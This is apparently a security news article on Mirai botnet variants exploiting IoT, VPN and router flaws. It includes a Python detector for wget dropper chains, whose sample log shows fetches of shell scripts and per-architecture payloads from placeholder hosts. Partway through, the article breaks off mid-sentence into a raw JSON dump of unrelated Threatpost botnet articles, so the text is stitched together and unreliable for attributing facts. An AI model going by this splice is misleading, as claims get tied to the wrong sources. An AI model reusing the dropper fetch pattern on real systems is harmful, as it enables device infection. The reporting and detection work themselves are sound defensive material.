Cybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet connected devices.
"Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers," Palo Alto Networks' Unit 42 Threat Intelligence Team [said](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in a write-up.
The vulnerabilities being exploited include:
* [VisualDoor](<https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/>) - a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January
* [CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>) - a D-Link DNS-320 firewall remote code execution (RCE) vulnerability
* [CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>) - two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges
* [CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>) - an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40
* [CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) - a Netis WF2419 wireless router RCE vulnerability, and
* [CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>) - a Netgear ProSAFE Plus RCE vulnerability
"The VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases," SonicWall said in a statement to The Hacker News. "It is not viable against any properly patched SonicWall appliances."
Also included in the mix are three previously undisclosed command injection vulnerabilities that were deployed against unknown targets, one of which, according to the researchers, has been observed in conjunction with a separate botnet by the name of [MooBot](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot>).
The attacks are said to have been detected over a month-long period, from February 16 to as recently as March 13.
Regardless of the flaw used to gain a foothold, the attack chain is the same: the wget utility downloads a shell script from the malware infrastructure, and that script in turn fetches [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) binaries. Mirai is notorious malware that turns networked Linux-based IoT devices into remotely controlled bots, which can then be used as part of a botnet in large-scale network attacks.
Besides downloading Mirai, additional shell scripts have been spotted retrieving executables to facilitate brute-force attacks to break into vulnerable devices with weak passwords.
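As an added example (not code from the article or from Unit 42), the following Python detector looks for the dropper chain described above in an egress proxy log: a client that uses wget to fetch a shell script and then, within a short window, per-architecture binaries from the same host. The log format, IP addresses, file names and architecture suffixes are assumptions constructed for this example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed log format for this example (one request per line):
#   <ISO-8601 time> <client ip> <method> <url> "<user-agent>"
LOG_RE = re.compile(r'^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+"([^"]*)"$')

# Heuristic suffixes (assumed, not taken from the article): the dropper
# script is a .sh file, and the follow-up payloads are named per CPU
# architecture, as Mirai-style droppers commonly do.
SCRIPT_SUFFIXES = (".sh",)
ARCH_SUFFIXES = (".arm", ".arm5", ".arm6", ".arm7", ".mips", ".mpsl", ".mipsel",
                 ".x86", ".x86_64", ".sh4", ".ppc", ".m68k", ".spc")


@dataclass
class Request:
    ts: datetime
    client: str
    method: str
    url: str
    agent: str


@dataclass
class Chain:
    """One suspected dropper chain: a script fetch plus the binaries that followed it."""
    client: str
    host: str
    script_url: str
    binaries: list = field(default_factory=list)


def parse_line(line: str):
    """Parse one log line into a Request, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
    return Request(ts, m.group(2), m.group(3), m.group(4), m.group(5))


def classify(url: str):
    """Return "script", "binary" or None based on the URL path suffix."""
    path = urlsplit(url).path.lower()
    if path.endswith(SCRIPT_SUFFIXES):
        return "script"
    if path.endswith(ARCH_SUFFIXES):
        return "binary"
    return None


def is_wget(agent: str) -> bool:
    # The chain in the article is driven by wget; other clients are ignored here.
    return agent.lower().startswith("wget/")


def find_dropper_chains(lines, window=timedelta(minutes=10)):
    """Return one Chain per (client, script fetch) that is followed within
    `window` by wget fetches of arch-named binaries from the same host."""
    per_client = defaultdict(list)
    for line in lines:
        req = parse_line(line)
        if req and req.method == "GET" and is_wget(req.agent):
            per_client[req.client].append(req)

    chains = []
    for client, reqs in per_client.items():
        reqs.sort(key=lambda r: r.ts)
        for i, r in enumerate(reqs):
            if classify(r.url) != "script":
                continue
            host = urlsplit(r.url).hostname
            chain = Chain(client, host, r.url)
            for later in reqs[i + 1:]:
                if later.ts - r.ts > window:
                    break  # requests are sorted, so nothing later can qualify
                if urlsplit(later.url).hostname == host and classify(later.url) == "binary":
                    chain.binaries.append(later.url)
            if chain.binaries:
                chains.append(chain)
    return chains


# Constructed sample log (RFC 5737 documentation addresses as the "malware hosts").
# Client .20 shows the full chain; .33 is ordinary browsing; .50 fetches a script
# but the binary comes far outside the window, so it is not flagged.
SAMPLE_LOG = """
2021-03-01T10:15:02Z 192.168.1.20 GET http://203.0.113.45/setup.sh "Wget/1.20.3 (linux-gnu)"
2021-03-01T10:15:05Z 192.168.1.20 GET http://203.0.113.45/payload.arm7 "Wget/1.20.3 (linux-gnu)"
2021-03-01T10:15:09Z 192.168.1.20 GET http://203.0.113.45/payload.mips "Wget/1.20.3 (linux-gnu)"
2021-03-01T10:15:20Z 192.168.1.20 GET http://198.51.100.9/payload.x86 "Wget/1.20.3 (linux-gnu)"
2021-03-01T10:16:00Z 192.168.1.33 GET https://example.com/index.html "Mozilla/5.0"
2021-03-01T10:20:00Z 192.168.1.50 GET http://198.51.100.7/update.sh "Wget/1.21"
2021-03-01T11:30:00Z 192.168.1.50 GET http://198.51.100.7/payload.x86 "Wget/1.21"
"""

if __name__ == "__main__":
    for c in find_dropper_chains(SAMPLE_LOG.splitlines()):
        print(f"{c.client} fetched {c.script_url} then {len(c.binaries)} binaries from {c.host}")
```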
"The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences," the researcher said.
### New ZHtrap Botnet Traps Victims Using a Honeypot
In a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as [Matryosh](<https://thehackernews.com/2021/02/beware-new-matryosh-ddos-botnet.html>).
While honeypots typically mimic a target for cyber criminals so as to take advantage of their intrusion attempts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for gathering IP addresses that are used as targets for further worm-like propagation.
It does so by listening on 23 designated ports and recording the IP addresses that connect to them, then probing the amassed addresses for four vulnerabilities through which to inject its payload:
* MVPower DVR Shell [unauthenticated RCE](<https://www.exploit-db.com/exploits/41471>)
* Netgear DGN1000 Setup.cgi [unauthenticated RCE](<https://www.exploit-db.com/exploits/43055>)
* [CCTV DVR RCE](<https://www.exploit-db.com/exploits/39596>) affecting multiple vendors, and
* Realtek SDK miniigd SOAP [command execution](<https://www.exploit-db.com/exploits/37169>) (CVE-2014-8361)
"ZHtrap's propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features," the researchers [said](<https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/>). "Zhtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device."
Once it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads.
Noting that the attacks began on February 28, 2021, the researchers said ZHtrap's ability to turn infected devices into honeypots marks an "interesting" evolution of botnets to facilitate finding more targets.
These Mirai-based botnets are the latest to spring up on the threat landscape, fanned in part by the public availability of Mirai's source code since 2016, which threw the field wide open for other attackers to build their own variants.
Last March, researchers discovered a Mirai variant called "[Mukashi](<https://thehackernews.com/2020/03/zyxel-mukashi-mirai-iot-botnet.html>)," which was found targeting Zyxel network-attached storage (NAS) devices to conscript them into a botnet. Then in October 2020, Avira's IoT research team identified another variant of the Mirai botnet named "[Katana](<https://www.avira.com/en/blog/katana-a-new-variant-of-the-mirai-botnet>)," which exploited remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 switches.
These [were also seen in a variant of Gafgyt](<https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/>) used by Keksec that targeted Huawei and Asus routers and killed its rival IoT botnets.\n\n## **How Enterprises Can Protect Against Botnets**\n\nUptycs recommended a few measures for enterprise users and administrators to identify and protect against botnet attacks:\n\n * Regularly monitor the suspicious processes, events, and network traffic spawned on the execution of any untrusted binary/scripts.\n * Always be cautious in executing shell scripts from unknown or untrusted sources.\n * Keep systems and firmware updated with the latest releases and patches.\n", "cvss3": {}, "published": "2021-05-19T16:53:32", "type": "threatpost", "title": "Keksec Cybergang Debuts Simps Botnet for Gaming DDoS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361"], "modified": "2021-05-19T16:53:32", "id": "THREATPOST:991E2229B84BA734163394FA362D4D33", "href": "https://threatpost.com/keksec-simps-botnet-gaming-ddos/166306/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-08T12:00:30", "description": "New samples of the Mirai malware have been identified, targeting an array of embedded processors and architectures within connected devices.\n\nResearchers said that they discovered new Mirai samples in February 2019, capable of infecting IoT devices running Altera Nios II, OpenRISC, Tensilica Xtensa, and Xilinx MicroBlaze processors. Variants of Mirai have previously targeted CPU architectures like ARM and x86.\n\nWhile it\u2019s not the first time Mirai\u2019s targeting of new processor architectures has expanded \u2013 samples targeting Argonaut RISC Core (ARC) CPUs were discovered in [January 2018](<https://twitter.com/_odisseus/status/952643252116770817?ref_src=twsrc%5Etfw>) \u2013 the development shows that Mirai developers continue to expand their targets to incorporate a growing array of IoT devices, researchers with Palo Alto Networks\u2019 Unit 42 group said in a [Monday post](<https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/>).\n\n\u201cThe addition of these processors expands the pool of potential devices which can be compromised and used for malicious activity,\u201d Jen Miller-Osborn, deputy director of threat intelligence for Unit 42 at Palo Alto Networks, told Threatpost. 
\u201cWe can\u2019t confirm all devices which contain these processors or why the actors chose to compile for them.\u201d\n\nXilinx\u2019s MicroBlaze processor and Altera\u2019s Nios II processors are specifically designed for field programmable gate array (FPGA) integrated circuits. FPGAs, which allow users to program hardware circuits to optimize a chip for a particular workload, are used for IoT application requirements due to their low power.\n\nThe Mirai samples also are capable of infecting Tensilica\u2019s Xtensa processors, which range from small low-power microcontrollers up to neural network processors; and OpenRISC project-based open-source CPUs, several of which are also known to run on FPGAs.\n\n[Mirai Samples](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/08160552/Mirai-Sample.png>)\n\n\u201cExpanding Mirai-like malware to new architectures will only cause further headaches for those responsible for mitigating botnet activity,\u201d Troy Mursch, owner of Bad Packets Report, told Threatpost. \u201cGiven that the source code for Mirai has been open source for years now, this was inevitable. As for the impact of this \u2018expansion\u2019 we\u2019ll have to wait and see. DDoS attacks from Mirai-like botnets continue to plague the internet with some recently reaching nearly 40 Gbps in size.\u201d\n\nThe latest samples were discovered being hosted in an open directory on a single IP. The samples contained exploits that were known to be used in previous versions of Mirai.\n\nThat includes an exploit for a ThinkPHP remote code execution flaw, a D-Link DSL2750B OS command injection and a Netgear remote code execution glitch. 
Also included were exploits for CVE-2014-8361 (an arbitrary code execution flaw in Realtek SDK) and CVE-2017-17215 (a remote code execution flaw in Huawei HG532 routers).\n\n\u201cThe presence of these exploits in both previous versions of Mirai and our newly discovered samples help show the tie between the two are likely used by the same attacker in this case,\u201d researchers said.\n\nMursch said he has also seen the same exploit attempts targeting the vulnerabilities listed.\n\n\u201cThis is because the targeted devices do not get patched and become re-infected by Mirai-like malware over and over,\u201d he said. \u201cCVE-2017-17215 is notable as it was used by the [Satori botnet](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>) and infected hundreds of thousands of Huawei devices. The author of that botnet is now under indictment by the FBI.\u201d\n\nOn Feb. 22, the server was updated to hide the file listing, researchers said. A full list of Indicators of Compromise (IoCs) are available on their [blog post](<https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/>).\n\nMirai is best known for being used in a massive, unprecedented DDoS attack that compromised more than 300,000 IoT devices to take down major websites [in 2016](<https://threatpost.com/a-mirai-botnet-postscript-lessons-learned/130529/>).\n\nVariants of Mirai continue to pop up as cybercriminals tap into a growing rate of vulnerable Internet of Things devices. 
In September, researchers [discovered](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>) new variants for the infamous Mirai and Gafgyt IoT botnets targeting well-known vulnerabilities in Apache Struts and SonicWall; and in March researchers said that [a new Mirai variant](<https://threatpost.com/mirai-enterprise-systems/142889/>) was targeting TV and presentation systems used by enterprises.\n", "cvss3": {}, "published": "2019-04-08T20:40:56", "type": "threatpost", "title": "New Mirai Samples Grow the Number of Processor Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "modified": "2019-04-08T20:40:56", "id": "THREATPOST:1E765B1FCA5C193278D6E5A1951FF4BF", "href": "https://threatpost.com/new-mirai-samples-grow-the-number-of-processors-targets/143566/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Researchers at Radware have discovered a new botnet that uses vulnerabilities linked with the Satori botnet and is leveraging the Grand Theft Auto videogame community to infect IoT devices.\n\nSatori is a derivative of Mirai, the notorious botnet that in 2016 infamously managed to take down Dyn, a DNS hosting provider that supports some of the 
world\u2019s largest websites.\n\nThe vulnerabilities in question are [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) and [CVE-2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215>), which affect certain Huawei and Realtek routers, Radware researcher Pascal Geenens [said in a blog post](<https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/>).\n\nRadware\u2019s inquiry into the botnet led it to a command-and-control server hosted at the site San Calvicie, which offers not only multiplayer mod support for Grand Theft Auto: San Andreas, but also DDoS attacks for a fee.\n\nEnthusiasts of the venerable videogame series, which places players in an immersive 3-D world of violence and vicarious thrills, have created an extensive universe of add-on features and tweaks, or \u201cmods,\u201d in the name of enriching and extending their experience. Sites such as San Calvicie cater to GTA gamers who want to host their own [custom versions of GTA](<https://www.gta5-mods.com/>) for multiplayer action.\n\n\u201cThe Corriente Divina (\u2018divine stream\u2019) option is described as \u2018God\u2019s wrath will be employed against the IP that you provide us,\u201d Geenens wrote of the site\u2019s DDoS offering. \u201cIt provides a DDoS service with a guaranteed bandwidth of 90-100 Gbps and attack vectors including Valve Source Engine Query and 32 bytes floods, TS3 scripts and a \u2018Down OVH\u2019 option which most probably refers to attacks targeting the hosting service of [OVH](<https://www.ovh.com/>), a cloud hosting provider that also was a victim of the original [Mirai](<https://blog.radware.com/security/2016/10/busybox-botnet-mirai/>) attacks back in September 2016. 
OVH is well known for hosting multi-player gaming servers such as Minecraft, which was the target of the Mirai attacks at the time.\u201d\n\nShortly after Geenens made his initial discovery, he returned to the site and found that the terms of engagement had changed. Now the listing included a reference to \u201cbots,\u201d and offered a DDoS volume of between 290 and 300 Gbps, for the same low price of $20 a pop.\n\nWhile derived from established code, the San Calvicie-hosted botnet, which Geenens has dubbed \u201cJenX\u201d, is deployed in a different manner than its predecessors.\n\n\u201cUntypical for IoT botnets we have witnessed in the past year, this botnet uses servers to perform the scanning and the exploits,\u201d he wrote. \u201cNearly all botnets, including [Mirai](<https://blog.radware.com/security/2016/11/insight-into-mirais-source-code/>), [Hajime](<https://blog.radware.com/security/2017/04/hajime-futureproof-botnet/>), Persirai, [Reaper](<https://blog.radware.com/security/2017/10/iot_reaper-botnet/>), Satori and Masuta perform distributed scanning and exploiting. That is, each victim that is infected with the malware will perform its own search for new victims. This distributed scanning provides for an exponential growth of the botnet, but comes at the price of flexibility and sophistication of the malware itself.\u201d\n\nThe centralized approach employed by JenX trades slower growth for lower detection, he added.\n\nThe danger from JenX should be mostly confined to GTA San Andreas users, Geenens said, but with a stern caveat.\n\n\u201c[T]here is nothing that stops one from using the cheap $20 per target service to perform 290 Gbps attacks on business targets and even government related targets,\u201d he wrote. \u201cI cannot believe the San Calvicie group would oppose to it.\u201d\n\nRadware filed abuse notifications related to JenX, resulting in a partial takedown of the botnet\u2019s server footprint, but it remains active. 
JenX\u2019s implementation makes taking it down a tricky task.\n\n\u201cAs they opted for a central scan and exploit paradigm, the hackers can easily move their exploit operations to bulletproof hosting providers who provide anonymous VPS and dedicated servers from offshore zones,\u201d he wrote. \u201cThese providers do not care about abuse. Some are even providing hosting services from the Darknet. If the exploit servers would be moved to the Darknet, it would make it much more difficult to track down the servers\u2019 location and take them down.\u201d\n", "cvss3": {}, "published": "2018-02-02T13:32:17", "type": "threatpost", "title": "JenX Botnet Has Grand Theft Auto Hook", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "modified": "2018-02-02T13:32:17", "id": "THREATPOST:D01E39B118AD961C99A79B4280C13B6A", "href": "https://threatpost.com/jenx-botnet-has-grand-theft-auto-hook/129759/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:58", "description": "Exploit code used in the Mirai malware variant called Satori, which was used to attack hundreds of thousands of Huawei routers over the [past several weeks](<https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/>), is now public. Researchers warn the code will quickly become a commodity and be leveraged in DDoS attacks via botnets such as Reaper or IOTrooper.\n\nAnkit Anubhav, researcher at NewSky Security, first identified the code on Monday that was posted publicly on Pastebin.com. The code exploits the zero-day vulnerability CVE-2017-17215, used by a hacker identified as \u201cNexus Zeta\u201d to spread a variant of the Mirai malware called Satori, also known as Mirai Okiru.\n\n\u201cThe fact that the code is now in the open means that more threat actors would now be using it. 
We can assume that the exploit would become commodity, and IoT botnets that attempt at exploiting a large kit of vulnerabilities will be adding CVE-2017-17215 to their arsenal,\u201d said Maya Horowitz, threat intelligence group manager, Check Point.\n\n[Last week](<https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/>), Check Point identified the vulnerability ([CVE-2017-17215](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215>)) in a Huawei home router model HG532 that was being exploited by Nexus Zeta to spread the Mirai variant Mirai Okiru/Satori. Since then Huawei issued an updated [security notice](<http://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en>) to customers warning the flaw allows a remote adversary to send malicious packets to port 37215 to execute remote code on vulnerable routers.\n\n\u201cThis code is now known to a variety of black hats. Just like previous SOAP exploits released for free to the public it will be used by various script kiddies and threat actors,\u201d Anubhav said. NewSky Security posted [a blog Thursday outlining its discovery](<https://blog.newskysecurity.com/huawei-router-exploit-involved-in-satori-and-brickerbot-given-away-for-free-on-christmas-by-ac52fe5e4516>) of the zero-day code.\n\nThe underlying cause was a bug related to SOAP, a protocol used by many IoT devices, Anubhav said. Earlier issues in SOAP (CVE-2014-8361 and TR-064) affected different vendors and were widely used by Mirai variants.\n\nIn the case of CVE-2017-17215, this zero-day exploits how the Huawei router uses the Universal Plug and Play (UPnP) protocol and the TR-064 technical report standard. TR-064 is a standard designed to make it easy to add embedded UPnP devices to a local network.\n\n\u201cIn this case though, the TR-064 implementation in the Huawei devices was exposed to WAN through port 37215 (UPnP),\u201d researchers wrote. 
The UPnP framework supports a \u201cDeviceUpgrade\u201d that can carry out a firmware upgrade action.\n\nThe vulnerability allows remote administrators to execute arbitrary commands by injecting shell meta-characters into the DeviceUpgrade process.\n\n\u201cAfter these have been executed, the exploit returns the default HUAWEIUPNP message, and the \u2018upgrade\u2019 is initiated,\u201d Check Point researchers wrote.\n\nThe payload\u2019s main purpose is to instruct the bot to flood targets with manually crafted UDP or TCP packets.\n\n\u201cThe exploit code was already used by two major IoT botnets, Brickerbot and Satori, and now that the code is public it will be incorporated into different botnet strains,\u201d Anubhav said.\n\nMitigation against attacks includes configuring a router\u2019s built-in firewall, changing the default password or using firewall at the carrier side, Huawei said.\n\n\u201cPlease note that users of this router are mostly home users, who do not typically log in to their router\u2019s interface and don\u2019t necessarily have the know-how, and so unfortunately I have to assume most devices would stay vulnerable,\u201d Horowitz said. 
\u201cWe desperately need IoT device manufacturers to make security a top priority and not to leave the users accountable.\u201d\n", "cvss3": {}, "published": "2017-12-28T14:01:00", "type": "threatpost", "title": "Code Used in Zero Day Huawei Router Attack Made Public", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "modified": "2017-12-28T14:01:00", "id": "THREATPOST:58600E628B858CCDB55A42CF867B1CF7", "href": "https://threatpost.com/code-used-in-zero-day-huawei-router-attack-made-public/129260/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-04T07:17:10", "description": "A vulnerability in some Huawei routers used for carrier ISP services allows cybercriminals to identify whether the devices have default credentials or not \u2013 without ever connecting to them.\n\nCVE-2018-7900 exists in the router panel and allows credentials information to leak \u2013 so attackers can simply perform a [ZoomEye](<https://www.zoomeye.org/>) or Shodan IoT search to find list of the devices having default passwords \u2013 no need for bruteforcing or running the risk of running into a generic honeypot.\n\n\u201cWhen someone has a look on the html source code of login page, few variables are declared. One of the variables contain a specific value. By monitoring this specific value, one can come to the conclusion that the device has the default password,\u201d explained Ankit Anubhav, principal researcher at NewSky Security, [in a posting](<https://blog.newskysecurity.com/information-disclosure-vulnerability-cve-2018-7900-makes-it-easy-for-attackers-to-find-huawei-3e7039b6f44f>) on Wednesday. \u201cThe attacker can simply go to ZoomEye, find a list of devices, login, and do what they want with minimal hacking skills. 
As easy as that.\u201d\n\nHuawei has issued a fix and worked with its carrier customers to implement it across networks.\n\nNewSky said it wouldn\u2019t disclose exact details of the flaw nor the numbers of affected devices that it uncovered during its own ZoomEye search (though Anubhav referred to the numbers of affected devices as \u201cconcerning\u201d).\n\nThis is only the latest issue affecting carrier-level gear \u2013 and it\u2019s a problematic trend given the scope of the potential attack surface.\n\n\u201cThe attack vectors which can infect a huge number of IoT devices are much more favored than using a vulnerability in a vendor which has only 500 devices online,\u201d said Anubhav. \u201cHence, in 2018 we saw [CVE-2018-14847](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) (MikroTik) and [CVE-2014-8361](<https://threatpost.com/unpatched-router-vulnerability-could-lead-to-code-execution/112524/>) are being highly used. One commonality among them is the sheer high number of devices which can be abused using the vulnerabilities. Hence, a security loophole in a big IoT vendor can be a more critical issue than a usual one.\u201d\n", "cvss3": {}, "published": "2018-12-20T20:41:46", "type": "threatpost", "title": "Huawei Router Flaw Leaks Default Credential Status", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2018-14847", "CVE-2018-7900"], "modified": "2018-12-20T20:41:46", "id": "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C", "href": "https://threatpost.com/huawei-router-default-credential/140234/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-14T18:09:15", "description": "A variant of the Mirai botnet called Moobot saw a big spike in activity recently, with researchers picking up widespread scanning in their telemetry for a [known vulnerability in Tenda routers](<https://threatpost.com/tenda-router-zero-days-spyware-botnet/159834/>). 
It turns out that it was being pushed out from a new cyber-underground malware domain, known as Cyberium, which has been anchoring a large amount of Mirai-variant activity.\n\nAccording to AT&T Alien Labs, the scanning for vulnerable Tenda routers piqued researcher interest given that such activity is typically rare. The targeted bug is a remote code-execution (RCE) issue (CVE-2020-10987).\n\n\u201cThis spike was observed throughout a significant number of clients, in the space of a few hours,\u201d according to an AT&T analysis, [released Monday](<https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants>). \u201cThis vulnerability is not commonly used by web scanners and was barely detected by our honeypots during the last six months, except for a minor peak in November.\u201d\n\nFollowing the breadcrumbs of the activity, researchers tracked down the infrastructure behind the Tenda scans in late March \u2013 discovering that it was being used to scan for additional bugs, in the Axis SSI, Huawei home routers (CVE-2017-17215) and the Realtek SDK Miniigd (CVE-2014-8361). It was also deploying a DVR scanner that tried default credentials for the Sofia video application. These compromise efforts were tied to a variety of different Mirai-based botnet infections, including the [Satori botnet](<https://threatpost.com/satori-botnet-creator-prison/156947/>).\n\n## **Cyberium in Action**\n\nA commonality across all of the activity is that the malware deposited on compromised devices was pulled from the same malware hosting page: dns.cyberium[.]cc.\n\n\u201cWhen this domain was investigated, several campaigns were identified, going back at least one year to May 2020,\u201d according to AT&T. 
\u201cMost of the attacks lasted for approximately a week while they hosted several [Mirai variants](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>).\u201d\n\nInterestingly, each campaign had its own subdomain page below the top-level Cyberium page, and when it was completed, the subdomain became unresolvable. While active, the campaign would cycle between different Mirai variants: The same URL could be hosting Satori one day and Moobot the week after, according to AT&T.\n\n\u201cThe actors appear to come back to the same domain with a new subdomain for each new campaign,\u201d researchers explained. \u201cActivity in between campaigns goes quiet to increase the trust of the original domain. Keeping a long-running existing domain while issuing a brand-new subdomain helps to divert attention to the new domain and thus distract from the original.\u201d\n\nAfter initial compromise of a targeted internet of things (IoT) device, the first request to Cyberium was for a bash script that acted like a downloader.\n\n\u201cThe script attempts to download a list of filenames (associated with different CPU architectures), executes each one of them, achieves persistence through a crontab that redownloads the bash script itself and finally deletes itself,\u201d according to the analysis.\n\nThis script is very similar to downloaders previously seen for Mirai variants, researchers noted.\n\n## **Moobot Stampedes onto Malware Scene**\n\nMoobot was [first spotted in April 2020](<https://threatpost.com/mootbot-fiber-routers-zero-days/154962/>), using a pair of zero-day exploits to compromise multiple types of fiber routers. Then last October, it was seen going after vulnerable Docker APIs. In all cases, the goal is to add devices as nodes in a botnet used to carry out distributed denial of service (DDoS) attacks, just like [Mirai itself](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>). 
It isn\u2019t one of the more common variants, however.\n\nOne of the main distinctions of Moobot is a hardcoded string that\u2019s used several times throughout the code, including generating the process name to be used during execution, according to AT&T.\n\n\u201cThe number of samples Alien Labs has seen with that string has greatly increased in the last months, scattering from the original Moobot sample,\u201d AT&T noted. \u201cThis could potentially mean that last year\u2019s Moobots samples were used to create new branches of Mirai variants.\u201d\n\nIn a new wrinkle, the observed Moobot samples were encrypted.\n\n\u201cHowever, it did maintain other previously seen characteristics, like a hardcoded list of IP addresses to avoid, such as: Private ranges, the Department of Defense, IANA IPs, GE, HP and others,\u201d according to the analysis.\n\n## **Cyberium: Unanswered Questions**\n\nAT&T found that Cyberium has been in action for the past year or so and that it appears to be active still. At the time of publication, some of the Cyberium subdomains were up, but not hosting any malware samples \u2013 potentially indicating that the pages are awaiting new requests for command-and-control server (C2) lists, according to AT&T.\n\nThe researchers said that the cybercriminals behind Cyberium remain somewhat mysterious.\n\n\u201cSeveral questions remain unanswered,\u201d researchers concluded. \u201cWhy would the attackers deliver different Mirai variants with different C2s on the same campaign? Are they trying to avoid anti-virus detection through diversification of variants? 
Or, are they trying to improve the botnet resiliency by diversifying C2?\u201d\n", "cvss3": {}, "published": "2021-06-14T17:43:34", "type": "threatpost", "title": "Moobot Milks Tenda Router Bugs for Propagation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2020-10987"], "modified": "2021-06-14T17:43:34", "id": "THREATPOST:4C2D088C37CAF9E8959CD8833D4B2668", "href": "https://threatpost.com/moobot-tenda-router-bugs/166902/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-09T11:36:53", "description": "A new Gafgyt variant is adding vulnerable internet of things (IoT) devices to its botnet arsenal and using them to cripple gaming servers worldwide.\n\nThe newly-discovered variant is capable of launching a variety of denial-of-service (DoS) attacks against the Valve Source Engine, a video game engine developed by Valve Corp. that runs popular games such as Half-Life and Team Fortress 2. 
Other gaming servers have also been targeted by the botnet, such as those hosting widely-played games such as Fortnite, researchers warn.\n\n\u201cThis Gafgyt variant is a competing botnet to the [JenX botnet](<https://threatpost.com/jenx-botnet-has-grand-theft-auto-hook/129759/>), which also uses remote code-execution exploits to gain access and recruit routers into botnets to attack gaming servers \u2013 most notably those running the Valve Source Engine \u2013 and cause a denial-of-service,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 research team, in [analysis released Thursday](<https://unit42.paloaltonetworks.com/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/>). \u201cThis variant also competes against similar botnets, which we have found are frequently sold on Instagram.\u201d\n\nGafgyt, a [botnet that was uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>), has become infamous for launching large-scale distributed denial-of-service (DDoS) attacks. The newest Gafgyt variant targets two of the same small-office router remote-code-execution flaws as its predecessor, JenX, which was disclosed in 2018.\n\nThe two previously-targeted flaws are CVE-2017-17215 (in the Huawei HG532) and 